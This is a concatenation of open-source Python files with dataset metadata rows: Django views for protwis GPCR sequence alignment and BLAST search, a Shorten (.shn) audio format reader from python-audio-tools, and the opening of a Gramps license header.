"Gaussian"
] |
05af82fa5ec76a101a1de4fc8c8ea0706f68b6afd9fdec5ee81e568780b7aead
|
from django.shortcuts import render
from django.conf import settings
from django.http import HttpResponse
from django.views.generic import TemplateView
from django.db.models import Case, When
from django.core.cache import cache
from django.core.cache import caches
try:
cache_alignment = caches['alignments']
except:
cache_alignment = cache
from alignment.functions import get_proteins_from_selection
from common import definitions
from common.selection import Selection
from common.views import AbsTargetSelection
from common.views import AbsSegmentSelection
from common.views import AbsMiscSelection
from common.sequence_signature import SequenceSignature, SignatureMatch, signature_score_excel
from structure.functions import BlastSearch
# from common.alignment_SITE_NAME import Alignment
Alignment = getattr(__import__('common.alignment_' + settings.SITE_NAME, fromlist=['Alignment']), 'Alignment')
from protein.models import Protein, ProteinSegment, ProteinFamily, ProteinSet
from residue.models import ResidueNumberingScheme, ResiduePositionSet
from collections import OrderedDict
from copy import deepcopy
import hashlib
import inspect
from io import BytesIO
import itertools
import json
import numpy as np
import os
import xlsxwriter
import xlrd
class TargetSelection(AbsTargetSelection):
step = 1
number_of_steps = 2
docs = 'sequences.html#structure-based-alignments'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', False),
])
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/alignment/segmentselection',
'color': 'success',
},
}
class PosTargetSelection(AbsTargetSelection):
step = 1
number_of_steps = 4
docs = 'sequences.html#structure-based-alignments'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', False),
])
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/alignment/negativegroupselection',
'color': 'success',
},
}
class NegTargetSelection(AbsTargetSelection):
step = 2
number_of_steps = 4
docs = 'sequences.html#structure-based-alignments'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', False),
])
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/alignment/segmentselectionsignature',
'color': 'success',
},
}
def get_context_data(self, **kwargs):
#A bit ugly solution to having two target sets without modifying half of common.selection
context = super(NegTargetSelection, self).get_context_data(**kwargs)
self.request.session['targets_pos'] = deepcopy(self.request.session.get('selection', False))
del self.request.session['selection']
return context
class TargetSelectionGprotein(AbsTargetSelection):
step = 1
number_of_steps = 2
psets = False
filters = True
filter_gprotein = True
docs = 'sequences.html#structure-based-alignments'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', False),
])
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/alignment/segmentselectiongprot',
'color': 'success',
},
}
try:
if ProteinFamily.objects.filter(slug="100_000").exists():
ppf = ProteinFamily.objects.get(slug="100_000")
pfs = ProteinFamily.objects.filter(parent=ppf.id)
ps = Protein.objects.filter(family=ppf)
tree_indent_level = []
action = 'expand'
# remove the parent family (for all other families than the root of the tree, the parent should be shown)
del ppf
except Exception as e:
pass
class TargetSelectionArrestin(AbsTargetSelection):
step = 1
number_of_steps = 2
psets = False
filters = True
filter_gprotein = True
docs = 'sequences.html#structure-based-alignments'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', False),
])
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/alignment/segmentselectionsignature',
'color': 'success',
},
}
try:
if ProteinFamily.objects.filter(slug="200_000").exists():
ppf = ProteinFamily.objects.get(slug="200_000")
pfs = ProteinFamily.objects.filter(parent=ppf.id)
ps = Protein.objects.filter(family=ppf)
tree_indent_level = []
action = 'expand'
# remove the parent family (for all other families than the root of the tree, the parent should be shown)
del ppf
except Exception as e:
pass
class SegmentSelection(AbsSegmentSelection):
step = 2
number_of_steps = 2
docs = 'sequences.html#structure-based-alignments'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', True),
])
buttons = {
'continue': {
'label': 'Show alignment',
'url': '/alignment/render',
'color': 'success',
},
}
class SegmentSelectionGprotein(AbsSegmentSelection):
step = 2
number_of_steps = 2
docs = 'sequences.html#structure-based-alignments'
description = 'Select sequence segments in the middle column for G proteins. You can expand every structural element and select individual' \
+ ' residues by clicking on the down arrows next to each helix, sheet or loop.\n\n You can select the full sequence or show all structured regions at the same time.\n\nSelected segments will appear in the' \
+ ' right column, where you can edit the list.\n\nOnce you have selected all your segments, click the green' \
+ ' button.'
template_name = 'common/segmentselection.html'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', True),
])
buttons = {
'continue': {
'label': 'Show alignment',
'url': '/alignment/render',
'color': 'success',
},
}
position_type = 'gprotein'
rsets = ResiduePositionSet.objects.filter(name__in=['Gprotein Barcode', 'YM binding site']).prefetch_related('residue_position')
ss = ProteinSegment.objects.filter(partial=False, proteinfamily='Gprotein').prefetch_related('generic_numbers')
ss_cats = ss.values_list('category').order_by('category').distinct('category')
class SegmentSelectionArrestin(AbsSegmentSelection):
step = 2
number_of_steps = 2
docs = 'sequences.html#structure-based-alignments'
description = 'Select sequence segments in the middle column for beta and visual arrestins. You can expand every structural element and select individual' \
+ ' residues by clicking on the down arrows next to each helix, sheet or loop.\n\n You can select the full sequence or show all structured regions at the same time.\n\nSelected segments will appear in the' \
+ ' right column, where you can edit the list.\n\nOnce you have selected all your segments, click the green' \
+ ' button.'
template_name = 'common/segmentselection.html'
selection_boxes = OrderedDict([
('reference', False),
('targets', True),
('segments', True),
])
buttons = {
'continue': {
'label': 'Show alignment',
'url': '/alignment/render',
'color': 'success',
},
}
position_type = 'arrestin'
## Add some Arrestin specific positions
rsets = ResiduePositionSet.objects.filter(name__in=['Arrestin interface']).prefetch_related('residue_position')
## ProteinSegment for different proteins
ss = ProteinSegment.objects.filter(partial=False, proteinfamily='Arrestin').prefetch_related('generic_numbers')
ss_cats = ss.values_list('category').order_by('category').distinct('category')
class SegmentSelectionSignature(AbsSegmentSelection):
step = 3
number_of_steps = 4
selection_boxes = OrderedDict([
('reference', False),
('targets', False),
('segments', True),
])
buttons = {
'continue': {
'label': 'Calculate sequence signature',
'url': '/alignment/render_signature',
'color': 'success',
},
}
class BlastSearchInput(AbsMiscSelection):
step = 1
number_of_steps = 1
docs = 'sequences.html#similarity-search-blast'
title = 'BLAST search'
description = 'Enter a sequence into the text box and press the green button.'
buttons = {
'continue': {
'label': 'BLAST',
'onclick': 'document.getElementById("form").submit()',
'color': 'success',
},
}
selection_boxes = {}
blast_input = True
class BlastSearchResults(TemplateView):
"""
An interface for blast similarity search of the input sequence.
"""
template_name="blast/blast_search_results.html"
def post(self, request, *args, **kwargs):
if 'human' in request.POST.keys():
blast = BlastSearch(blastdb=os.sep.join([settings.STATICFILES_DIRS[0], 'blast', 'protwis_human_blastdb']), top_results=50)
blast_out = blast.run(request.POST['input_seq'])
else:
blast = BlastSearch(top_results=50)
blast_out = blast.run(request.POST['input_seq'])
context = {}
context['results'] = [(Protein.objects.get(pk=x[0]), x[1]) for x in blast_out]
context["input"] = request.POST['input_seq']
return render(request, self.template_name, context)
def render_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
# create an alignment object
a = Alignment()
# load data from selection into the alignment
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
#create unique proteins_id
protein_ids = []
for p in a.proteins:
protein_ids.append(p.pk)
protein_list = ','.join(str(x) for x in sorted(protein_ids))
#create unique proteins_id
segments_ids = []
for s in a.segments:
segments_ids.append(s)
segments_list = ','.join(str(x) for x in sorted(segments_ids))
s = str(protein_list+"_"+segments_list)
key = "ALIGNMENT_"+hashlib.md5(s.encode('utf-8')).hexdigest()
return_html = cache_alignment.get(key)
if return_html==None or 'Custom' in segments_ids:
# build the alignment data matrix
check = a.build_alignment()
if check == 'Too large':
return render(request, 'alignment/error.html', {'proteins': len(a.proteins), 'residues':a.number_of_residues_total})
# calculate consensus sequence + amino acid and feature frequency
a.calculate_statistics()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
return_html = render(request, 'alignment/alignment.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns})
if 'Custom' not in segments_ids:
#update it if used
cache_alignment.set(key,return_html, 60*60*24*7) #set alignment cache one week
return return_html
def render_family_alignment(request, slug):
# create an alignment object
a = Alignment()
# fetch proteins and segments
proteins = Protein.objects.filter(family__slug__startswith=slug, sequence_type__slug='wt')
if len(proteins)>50 and len(slug.split("_"))<4:
# If alignment is going to be too big, only pick human.
proteins = Protein.objects.filter(family__slug__startswith=slug, sequence_type__slug='wt', species__latin_name='Homo sapiens')
if slug.startswith('100'):
gsegments = definitions.G_PROTEIN_SEGMENTS
preserved = Case(*[When(slug=pk, then=pos) for pos, pk in enumerate(gsegments['Full'])])
segments = ProteinSegment.objects.filter(slug__in = gsegments['Full'], partial=False).order_by(preserved)
else:
segments = ProteinSegment.objects.filter(partial=False, proteinfamily='GPCR')
if len(proteins)>50:
# if a lot of proteins, exclude some segments
segments = ProteinSegment.objects.filter(partial=False, proteinfamily='GPCR').exclude(slug__in=['N-term','C-term'])
if len(proteins)>200:
# if many more proteins exluclude more segments
segments = ProteinSegment.objects.filter(partial=False, proteinfamily='GPCR').exclude(slug__in=['N-term','C-term']).exclude(category='loop')
protein_ids = []
for p in proteins:
protein_ids.append(p.pk)
protein_list = ','.join(str(x) for x in sorted(protein_ids))
#create unique proteins_id
segments_ids = []
for s in segments:
segments_ids.append(s.slug)
segments_list = ','.join(str(x) for x in sorted(segments_ids))
s = str(protein_list+"_"+segments_list)
key = "ALIGNMENT_"+hashlib.md5(s.encode('utf-8')).hexdigest()
return_html = cache_alignment.get(key)
if return_html==None:
# load data into the alignment
a.load_proteins(proteins)
a.load_segments(segments)
# build the alignment data matrix
a.build_alignment()
# calculate consensus sequence + amino acid and feature frequency
a.calculate_statistics()
num_of_sequences = len(a.proteins)
num_residue_columns = len(a.positions) + len(a.segments)
return_html = render(request, 'alignment/alignment.html', {'a': a, 'num_of_sequences': num_of_sequences,
'num_residue_columns': num_residue_columns})
#update it if used
cache_alignment.set(key,return_html, 60*60*24*7) #set alignment cache one week
return return_html
def render_fasta_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
# create an alignment object
a = Alignment()
a.show_padding = False
# load data from selection into the alignment
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
response = render(request, 'alignment/alignment_fasta.html', context={'a': a}, content_type='text/fasta')
response['Content-Disposition'] = "attachment; filename=" + settings.SITE_TITLE + "_alignment.fasta"
return response
def render_fasta_family_alignment(request, slug):
# create an alignment object
a = Alignment()
a.show_padding = False
# fetch proteins and segments
proteins = Protein.objects.filter(family__slug__startswith=slug, sequence_type__slug='wt')
segments = ProteinSegment.objects.filter(partial=False)
# load data into the alignment
a.load_proteins(proteins)
a.load_segments(segments)
# build the alignment data matrix
a.build_alignment()
response = render(request, 'alignment/alignment_fasta.html', context={'a': a}, content_type='text/fasta')
response['Content-Disposition'] = "attachment; filename=" + settings.SITE_TITLE + "_alignment.fasta"
return response
def render_csv_alignment(request):
# get the user selection from session
simple_selection = request.session.get('selection', False)
# create an alignment object
a = Alignment()
a.show_padding = False
# load data from selection into the alignment
a.load_proteins_from_selection(simple_selection)
a.load_segments_from_selection(simple_selection)
# build the alignment data matrix
a.build_alignment()
# calculate consensus sequence + amino acid and feature frequency
a.calculate_statistics()
response = render(request, 'alignment/alignment_csv.html', context={'a': a}, content_type='text/csv')
response['Content-Disposition'] = "attachment; filename=" + settings.SITE_TITLE + "_alignment.csv"
return response
def render_reordered(request, group):
#grab the selections from session data
#targets set #1
ss_pos = request.session.get('targets_pos', False)
#targets set #2
ss_neg = request.session.get('selection', False)
aln = Alignment()
if group == 'positive':
aln.load_proteins_from_selection(ss_pos)
elif group == 'negative':
aln.load_proteins_from_selection(ss_neg)
aln.load_segments_from_selection(ss_neg)
aln.build_alignment()
aln.calculate_statistics()
return render(request, 'alignment/alignment_reordered.html', context={
'aln': aln,
'num_residue_columns': len(aln.positions) + len(aln.segments)
})
def render_signature(request):
# grab the selections from session data
# targets set #1
ss_pos = request.session.get('targets_pos', False)
# targets set #2
ss_neg = request.session.get('selection', False)
# setup signature
signature = SequenceSignature()
signature.setup_alignments_from_selection(ss_pos, ss_neg)
# calculate the signature
signature.calculate_signature()
# save for later
# signature_map = feats_delta.argmax(axis=0)
request.session['signature'] = signature.prepare_session_data()
request.session.modified = True
return_html = render(
request,
'sequence_signature/sequence_signature.html',
signature.prepare_display_data()
)
return return_html
def render_signature_excel(request):
# version #2 - 5 sheets with separate pieces of signature outline
# step 1 - repeat the data preparation for a sequence signature
# targets set #1
ss_pos = request.session.get('targets_pos', False)
# targets set #2
ss_neg = request.session.get('selection', False)
signature = SequenceSignature()
signature.setup_alignments_from_selection(ss_pos, ss_neg)
# calculate the signture
signature.calculate_signature()
outstream = BytesIO()
# wb = xlsxwriter.Workbook('excel_test.xlsx', {'in_memory': False})
wb = xlsxwriter.Workbook(outstream, {'in_memory': True})
# Feature stats for signature
signature.prepare_excel_worksheet(
wb,
'signature_properties',
'signature',
'features'
)
# Feature stats for positive group alignment
signature.prepare_excel_worksheet(
wb,
'positive_group_properties',
'positive',
'features'
)
# Positive group alignment
signature.prepare_excel_worksheet(
wb,
'positive_group_aln',
'positive',
'alignment'
)
# Feature stats for negative group alignment
signature.prepare_excel_worksheet(
wb,
'negative_group_properties',
'negative',
'features'
)
# Negative group alignment
signature.prepare_excel_worksheet(
wb,
'negative_group_aln',
'negative',
'alignment'
)
wb.close()
outstream.seek(0)
response = HttpResponse(
outstream.read(),
content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
)
response['Content-Disposition'] = "attachment; filename=sequence_signature.xlsx"
return response
def render_signature_match_scores(request, cutoff):
signature_data = request.session.get('signature')
# targets set #1
ss_pos = request.session.get('targets_pos', False)
# targets set #2
ss_neg = request.session.get('selection', False)
signature_match = SignatureMatch(
signature_data['common_positions'],
signature_data['numbering_schemes'],
signature_data['common_segments'],
signature_data['diff_matrix'],
get_proteins_from_selection(ss_pos) + get_proteins_from_selection(ss_neg)
)
signature_match.score_protein_class()
request.session['signature_match'] = {
'scores': signature_match.protein_report,
'protein_signatures': signature_match.protein_signatures,
'signature_filtered': signature_match.signature_consensus,
'relevant_gn': signature_match.relevant_gn,
'relevant_segments': signature_match.relevant_segments,
'numbering_schemes': signature_match.schemes,
}
response = render(
request,
'sequence_signature/signature_match.html',
{'scores': signature_match}
)
return response
def render_signature_match_excel(request):
print('Kurwa')
scores_data = request.session.get('signature_match', False)
outstream = BytesIO()
# wb = xlsxwriter.Workbook('excel_test.xlsx', {'in_memory': False})
wb = xlsxwriter.Workbook(outstream, {'in_memory': True})
signature_score_excel(
wb,
scores_data['scores'],
scores_data['protein_signatures'],
scores_data['signature_filtered'],
scores_data['relevant_gn'],
scores_data['relevant_segments'],
scores_data['numbering_schemes']
)
wb.close()
outstream.seek(0)
response = HttpResponse(
outstream.read(),
content_type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
)
response['Content-Disposition'] = "attachment; filename=sequence_signature_protein_scores.xlsx"
return response
|
fosfataza/protwis
|
alignment/views.py
|
Python
|
apache-2.0
| 21,703
|
[
"BLAST"
] |
c44fbe1c33cb25b90cf42bacf1c8b2d63f0b2eba48af6e01d25905d25e29323f
|
#!/usr/bin/python
#Audio Tools, a module and set of tools for manipulating audio data
#Copyright (C) 2007-2012 Brian Langenberger
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from audiotools import (AudioFile, ChannelMask, InvalidFile,
WaveContainer, AiffContainer)
import os.path
class InvalidShorten(InvalidFile):
pass
class ShortenAudio(WaveContainer, AiffContainer):
"""a Shorten audio file"""
SUFFIX = "shn"
NAME = SUFFIX
DESCRIPTION = u"Shorten"
def __init__(self, filename):
"""filename is a plain string"""
from .bitstream import BitstreamReader
from . import ChannelMask
import cStringIO
AudioFile.__init__(self, filename)
try:
f = open(filename, 'rb')
except IOError, msg:
raise InvalidShorten(str(msg))
reader = BitstreamReader(f, 0)
try:
if (reader.parse("4b 8u") != ["ajkg", 2]):
#FIXME
raise InvalidShorten("invalid Shorten header")
except IOError:
#FIXME
raise InvalidShorten("invalid Shorten header")
def read_unsigned(r, c):
MSB = r.unary(1)
LSB = r.read(c)
return MSB * 2 ** c + LSB
def read_long(r):
return read_unsigned(r, read_unsigned(r, 2))
#populate channels and bits_per_sample from Shorten header
(file_type,
self.__channels__,
block_length,
max_LPC,
number_of_means,
bytes_to_skip) = [read_long(reader) for i in xrange(6)]
if ((1 <= file_type) and (file_type <= 2)):
self.__bits_per_sample__ = 8
elif ((3 <= file_type) and (file_type <= 6)):
self.__bits_per_sample__ = 16
else:
#FIXME
raise InvalidShorten("unsupported Shorten file type")
#setup some default dummy metadata
self.__sample_rate__ = 44100
if (self.__channels__ == 1):
self.__channel_mask__ = ChannelMask(0x4)
elif (self.__channels__ == 2):
self.__channel_mask__ = ChannelMask(0x3)
else:
self.__channel_mask__ = ChannelMask(0)
self.__total_frames__ = 0
#populate sample_rate and total_frames from first VERBATIM command
command = read_unsigned(reader, 2)
if (command == 9):
verbatim_bytes = "".join([chr(read_unsigned(reader, 8) & 0xFF)
for i in xrange(read_unsigned(reader,
5))])
try:
wave = BitstreamReader(cStringIO.StringIO(verbatim_bytes), 1)
header = wave.read_bytes(12)
if (header.startswith("RIFF") and header.endswith("WAVE")):
#got RIFF/WAVE header, so parse wave blocks as needed
total_size = len(verbatim_bytes) - 12
while (total_size >= 8):
(chunk_id, chunk_size) = wave.parse("4b 32u")
total_size -= 8
if (chunk_id == 'fmt '):
from .wav import parse_fmt
(channels,
self.__sample_rate__,
bits_per_sample,
self.__channel_mask__) = parse_fmt(
wave.substream(chunk_size))
elif (chunk_id == 'data'):
self.__total_frames__ = \
(chunk_size /
(self.__channels__ *
(self.__bits_per_sample__ / 8)))
else:
if (chunk_size % 2):
wave.read_bytes(chunk_size + 1)
total_size -= (chunk_size + 1)
else:
wave.read_bytes(chunk_size)
total_size -= chunk_size
except (IOError, ValueError):
pass
try:
aiff = BitstreamReader(cStringIO.StringIO(verbatim_bytes), 0)
header = aiff.read_bytes(12)
if (header.startswith("FORM") and header.endswith("AIFF")):
#got FORM/AIFF header, so parse aiff blocks as needed
total_size = len(verbatim_bytes) - 12
while (total_size >= 8):
(chunk_id, chunk_size) = aiff.parse("4b 32u")
total_size -= 8
if (chunk_id == 'COMM'):
from .aiff import parse_comm
(channels,
total_sample_frames,
bits_per_sample,
self.__sample_rate__,
self.__channel_mask__) = parse_comm(
aiff.substream(chunk_size))
elif (chunk_id == 'SSND'):
#subtract 8 bytes for "offset" and "block size"
self.__total_frames__ = \
((chunk_size - 8) /
(self.__channels__ *
(self.__bits_per_sample__ / 8)))
else:
if (chunk_size % 2):
aiff.read_bytes(chunk_size + 1)
total_size -= (chunk_size + 1)
else:
aiff.read_bytes(chunk_size)
total_size -= chunk_size
except IOError:
pass
def bits_per_sample(self):
"""returns an integer number of bits-per-sample this track contains"""
return self.__bits_per_sample__
def channels(self):
"""returns an integer number of channels this track contains"""
return self.__channels__
def channel_mask(self):
"""returns a ChannelMask object of this track's channel layout"""
return self.__channel_mask__
def lossless(self):
"""returns True"""
return True
def total_frames(self):
"""returns the total PCM frames of the track as an integer"""
return self.__total_frames__
def sample_rate(self):
"""returns the rate of the track's audio as an integer number of Hz"""
return self.__sample_rate__
def to_pcm(self):
"""returns a PCMReader object containing the track's PCM data"""
from .decoders import SHNDecoder
from . import PCMReaderError
try:
return SHNDecoder(self.filename)
except (IOError, ValueError), msg:
#these may not be accurate if the Shorten file is broken
#but if it is broken, there'll be no way to
#cross-check the results anyway
return PCMReaderError(error_message=str(msg),
sample_rate=44100,
channels=2,
channel_mask=0x3,
bits_per_sample=16)
@classmethod
def from_pcm(cls, filename, pcmreader, compression=None,
block_size=256, encoding_function=None):
"""encodes a new file from PCM data
takes a filename string, PCMReader object
and optional compression level string
encodes a new audio file from pcmreader's data
at the given filename with the specified compression level
and returns a new ShortenAudio object"""
#can't build artificial header because we don't know
#how long the PCMReader will be and there's no way
#to go back and write one later because all the byte values
#are stored variable-sized
#so we have to build a temporary Wave file instead
from . import UnsupportedBitsPerSample
if (pcmreader.bits_per_sample not in (8, 16)):
raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)
from . import WaveAudio
import tempfile
f = tempfile.NamedTemporaryFile(suffix=".wav")
try:
w = WaveAudio.from_pcm(f.name, pcmreader)
(header, footer) = w.wave_header_footer()
return cls.from_wave(filename,
header,
w.to_pcm(),
footer,
compression,
block_size,
encoding_function)
finally:
if (os.path.isfile(f.name)):
f.close()
else:
f.close_called = True
def has_foreign_wave_chunks(self):
"""returns True if the audio file contains non-audio RIFF chunks
during transcoding, if the source audio file has foreign RIFF chunks
and the target audio format supports foreign RIFF chunks,
conversion should be routed through .wav conversion
to avoid losing those chunks"""
from . import decoders
from . import bitstream
import cStringIO
try:
(head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
header = bitstream.BitstreamReader(cStringIO.StringIO(head), 1)
(RIFF, SIZE, WAVE) = header.parse("4b 32u 4b")
if ((RIFF != 'RIFF') or (WAVE != 'WAVE')):
return False
#if the tail has room for chunks, there must be some foreign ones
if (len(tail) >= 8):
return True
#otherwise, check the header for foreign chunks
total_size = len(head) - bitstream.format_byte_size("4b 32u 4b")
while (total_size >= 8):
(chunk_id, chunk_size) = header.parse("4b 32u")
total_size -= bitstream.format_byte_size("4b 32u")
if (chunk_id not in ('fmt ', 'data')):
return True
else:
if (chunk_size % 2):
header.skip_bytes(chunk_size + 1)
total_size -= chunk_size + 1
else:
header.skip_bytes(chunk_size)
total_size -= chunk_size
else:
#no foreign chunks found
return False
except IOError:
return False
def wave_header_footer(self):
"""returns (header, footer) tuple of strings
containing all data before and after the PCM stream
if self.has_foreign_wave_chunks() is False,
may raise ValueError if the file has no header and footer
for any reason"""
from . import decoders
from . import bitstream
import cStringIO
try:
(head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
header = bitstream.BitstreamReader(cStringIO.StringIO(head), 1)
(RIFF, SIZE, WAVE) = header.parse("4b 32u 4b")
if ((RIFF != 'RIFF') or (WAVE != 'WAVE')):
#FIXME
raise ValueError("invalid wave header")
else:
return (head, tail)
except IOError:
#FIXME
raise ValueError("invalid wave header")
@classmethod
def from_wave(cls, filename, header, pcmreader, footer, compression=None,
block_size=256, encoding_function=None):
"""encodes a new file from wave data
takes a filename string, header string,
PCMReader object, footer string
and optional compression level string
encodes a new audio file from pcmreader's data
at the given filename with the specified compression level
and returns a new WaveAudio object
header + pcm data + footer should always result
in the original wave file being restored
without need for any padding bytes
may raise EncodingError if some problem occurs when
encoding the input file"""
from . import (CounterPCMReader,
BufferedPCMReader,
UnsupportedBitsPerSample,
EncodingError)
from .wav import (validate_header, validate_footer)
if (encoding_function is None):
from .encoders import encode_shn
else:
encode_shn = encoding_function
if (pcmreader.bits_per_sample not in (8, 16)):
raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)
#ensure header is valid
try:
(total_size, data_size) = validate_header(header)
except ValueError, err:
raise EncodingError(str(err))
counter = CounterPCMReader(pcmreader)
try:
if (len(footer) == 0):
encode_shn(filename=filename,
pcmreader=BufferedPCMReader(counter),
is_big_endian=False,
signed_samples=pcmreader.bits_per_sample == 16,
header_data=header,
block_size=block_size)
else:
encode_shn(filename=filename,
pcmreader=BufferedPCMReader(counter),
is_big_endian=False,
signed_samples=pcmreader.bits_per_sample == 16,
header_data=header,
footer_data=footer,
block_size=block_size)
data_bytes_written = counter.bytes_written()
#ensure output data size matches the "data" chunk's size
if (data_size != data_bytes_written):
from .text import ERR_WAV_TRUNCATED_DATA_CHUNK
raise EncodingError(ERR_WAV_TRUNCATED_DATA_CHUNK)
#ensure footer validates correctly
try:
validate_footer(footer, data_bytes_written)
except ValueError, err:
raise EncodingError(str(err))
#ensure total size is correct
if ((len(header) + data_size + len(footer)) != total_size):
from .text import ERR_WAV_INVALID_SIZE
raise EncodingError(ERR_WAV_INVALID_SIZE)
return cls(filename)
except IOError, err:
cls.__unlink__(filename)
raise EncodingError(str(err))
except Exception, err:
cls.__unlink__(filename)
raise err
def has_foreign_aiff_chunks(self):
"""returns True if the audio file contains non-audio AIFF chunks
during transcoding, if the source audio file has foreign AIFF chunks
and the target audio format supports foreign AIFF chunks,
conversion should be routed through .aiff conversion
to avoid losing those chunks"""
from . import decoders
from . import bitstream
import cStringIO
try:
(head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
header = bitstream.BitstreamReader(cStringIO.StringIO(head), 0)
(FORM, SIZE, AIFF) = header.parse("4b 32u 4b")
if ((FORM != 'FORM') or (AIFF != 'AIFF')):
return False
#if the tail has room for chunks, there must be some foreign ones
if (len(tail) >= 8):
return True
#otherwise, check the header for foreign chunks
total_size = len(head) - bitstream.format_byte_size("4b 32u 4b")
while (total_size >= 8):
(chunk_id, chunk_size) = header.parse("4b 32u")
total_size -= bitstream.format_byte_size("4b 32u")
if (chunk_id not in ('COMM', 'SSND')):
return True
else:
if (chunk_size % 2):
header.skip_bytes(chunk_size + 1)
total_size -= chunk_size + 1
else:
header.skip_bytes(chunk_size)
total_size -= chunk_size
else:
#no foreign chunks found
return False
except IOError:
return False
def aiff_header_footer(self):
"""returns (header, footer) tuple of strings
containing all data before and after the PCM stream
if self.has_foreign_aiff_chunks() is False,
may raise ValueError if the file has no header and footer
for any reason"""
from . import decoders
from . import bitstream
import cStringIO
try:
(head, tail) = decoders.SHNDecoder(self.filename).pcm_split()
header = bitstream.BitstreamReader(cStringIO.StringIO(head), 0)
(FORM, SIZE, AIFF) = header.parse("4b 32u 4b")
if ((FORM != 'FORM') or (AIFF != 'AIFF')):
#FIXME
raise ValueError("invalid AIFF header")
else:
return (head, tail)
except IOError:
#FIXME
raise ValueError("invalid AIFF header")
@classmethod
def from_aiff(cls, filename, header, pcmreader, footer, compression=None,
block_size=256, encoding_function=None):
"""encodes a new file from AIFF data
takes a filename string, header string,
PCMReader object, footer string
and optional compression level string
encodes a new audio file from pcmreader's data
at the given filename with the specified compression level
and returns a new AiffAudio object
header + pcm data + footer should always result
in the original AIFF file being restored
without need for any padding bytes
may raise EncodingError if some problem occurs when
encoding the input file"""
from . import (CounterPCMReader,
BufferedPCMReader,
UnsupportedBitsPerSample,
EncodingError)
from .aiff import (validate_header, validate_footer)
if (encoding_function is None):
from .encoders import encode_shn
else:
encode_shn = encoding_function
if (pcmreader.bits_per_sample not in (8, 16)):
raise UnsupportedBitsPerSample(filename, pcmreader.bits_per_sample)
#ensure header is valid
try:
(total_size, ssnd_size) = validate_header(header)
except ValueError, err:
raise EncodingError(str(err))
counter = CounterPCMReader(pcmreader)
try:
if (len(footer) == 0):
encode_shn(filename=filename,
pcmreader=BufferedPCMReader(counter),
is_big_endian=True,
signed_samples=True,
header_data=header,
block_size=block_size)
else:
encode_shn(filename=filename,
pcmreader=BufferedPCMReader(counter),
is_big_endian=True,
signed_samples=True,
header_data=header,
footer_data=footer,
block_size=block_size)
ssnd_bytes_written = counter.bytes_written()
#ensure output data size matches the "SSND" chunk's size
if (ssnd_size != ssnd_bytes_written):
from .text import ERR_AIFF_TRUNCATED_SSND_CHUNK
raise EncodingError(ERR_AIFF_TRUNCATED_SSND_CHUNK)
#ensure footer validates correctly
try:
validate_footer(footer, ssnd_bytes_written)
except ValueError, err:
raise EncodingError(str(err))
#ensure total size is correct
if ((len(header) + ssnd_size + len(footer)) != total_size):
from .text import ERR_AIFF_INVALID_SIZE
raise EncodingError(ERR_AIFF_INVALID_SIZE)
return cls(filename)
except IOError, err:
cls.__unlink__(filename)
raise EncodingError(str(err))
except Exception, err:
cls.__unlink__(filename)
raise err
def convert(self, target_path, target_class, compression=None,
progress=None):
"""encodes a new AudioFile from existing AudioFile
take a filename string, target class and optional compression string
encodes a new AudioFile in the target class and returns
the resulting object
may raise EncodingError if some problem occurs during encoding"""
#A Shorten file cannot contain both RIFF and AIFF chunks
#at the same time.
import tempfile
from . import WaveAudio
from . import AiffAudio
from . import to_pcm_progress
if ((self.has_foreign_wave_chunks() and
hasattr(target_class, "from_wave") and
callable(target_class.from_wave))):
return WaveContainer.convert(self,
target_path,
target_class,
compression,
progress)
elif (self.has_foreign_aiff_chunks() and
hasattr(target_class, "from_aiff") and
callable(target_class.from_aiff)):
return AiffContainer.convert(self,
target_path,
target_class,
compression,
progress)
else:
return target_class.from_pcm(target_path,
to_pcm_progress(self, progress),
compression)
|
R-a-dio/python-audio-tools
|
audiotools/shn.py
|
Python
|
gpl-2.0
| 22,906
|
[
"Brian"
] |
b1c3dcd20692884b8b7da7b98c615955c383b5ba61bdd6bcfc4f97ac7cf85f4a
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Adapted from Graphviz.py (now deprecated)
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2005-2006 Eero Tamminen
# Copyright (C) 2007-2008 Brian G. Matherly
# Copyright (C) 2007 Johan Gonqvist <johan.gronqvist@gmail.com>
# Contributions by Lorenzo Cappelletti <lorenzo.cappelletti@email.it>
# Copyright (C) 2008 Stephane Charette <stephanecharette@gmail.com>
# Copyright (C) 2009 Gary Burton
# Contribution 2009 by Bob Ham <rah@bash.sh>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2013 Fedir Zinchuk <fedikw@gmail.com>
